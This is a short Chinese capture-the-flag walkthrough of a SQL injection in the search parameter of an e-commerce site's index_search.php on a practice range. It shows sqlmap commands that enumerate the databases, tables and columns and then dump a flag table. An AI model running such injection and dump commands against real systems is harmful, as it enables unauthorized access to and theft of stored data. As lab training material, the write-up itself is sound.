目录
靶标介绍
E-Commerce Website 1.0 允许通过“index_search.php”中的参数“search”进行 SQL 注入。利用这个问题可能会使攻击者有机会破坏应用程序,访问或修改数据,或者利用底层数据库中的最新漏洞。
开启靶场
往下滑发现一个搜索框,输入 1,然后用 Burp 在抓包
数据包如下,放进文本文档,重命名为 test.txt 放到桌面
sqlmap 获取所有数据库名
利用 sqlmap 跑 test.txt
python sqlmap.py -r "D:\desktop\test.txt" --batch --dbs
发现一共有 4 个数据库
sqlmap 获取当前数据库名
python sqlmap.py -r "D:\desktop\test.txt" --batch --current-db
发现了当前数据库名是 electricks
sqlmap 获取数据库中的表
python sqlmap.py -r "D:\desktop\test.txt" --batch -D electricks --tables
发现了可疑表名 flllaaaag
sqlmap 获取表中字段名
python sqlmap.py -r "D:\desktop\test.txt" --batch -D electricks -T flllaaaag --columns
发现了字段名是 flag,看来是找对了
sqlmap 获取表中数据
python sqlmap.py -r "D:\desktop\test.txt" --batch -D electricks -T flllaaaag -C flag --dump
得到了本关的 flag